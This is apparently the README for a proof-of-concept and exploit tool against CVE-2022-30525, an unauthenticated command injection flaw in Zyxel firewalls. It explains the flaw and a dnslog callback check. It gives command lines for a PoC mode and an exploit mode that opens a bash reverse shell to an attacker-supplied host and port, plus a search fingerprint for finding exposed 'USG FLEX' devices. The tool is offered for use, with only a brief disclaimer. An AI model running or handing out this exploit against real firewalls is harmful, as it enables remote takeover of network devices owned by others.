
CVE-2022-30525 Zyxel 防火墙命令注入漏洞 POC&EXPC
CVE-2022-30525 POC&EXP
author:160team.west9B
For use only by authorized security researchers. Comply with cybersecurity laws. Any issues arising are your own responsibility, and the author bears no liability.
On May 12, 2022, Zyxel released a security advisory to fix an unauthenticated remote command injection vulnerability (CVE-2022-30525) in its firewall devices, with a CVSS score of 9.8. The vulnerability exists in the CGI program of certain Zyxel firewall versions, allowing arbitrary command execution on affected devices without authentication.
Affected versions:
This vulnerability's command execution has no output, so the POC verification requests the dnslog API. If dnslog receives a request, the vulnerability exists. To prevent false positives due to network latency, the DNSLOG verification request is delayed by 10 seconds.
usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/
EXP bash reverse shell: specify VPS IP and port after -m exp.
**usage_exp:./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337 **

title="USG FLEX xx"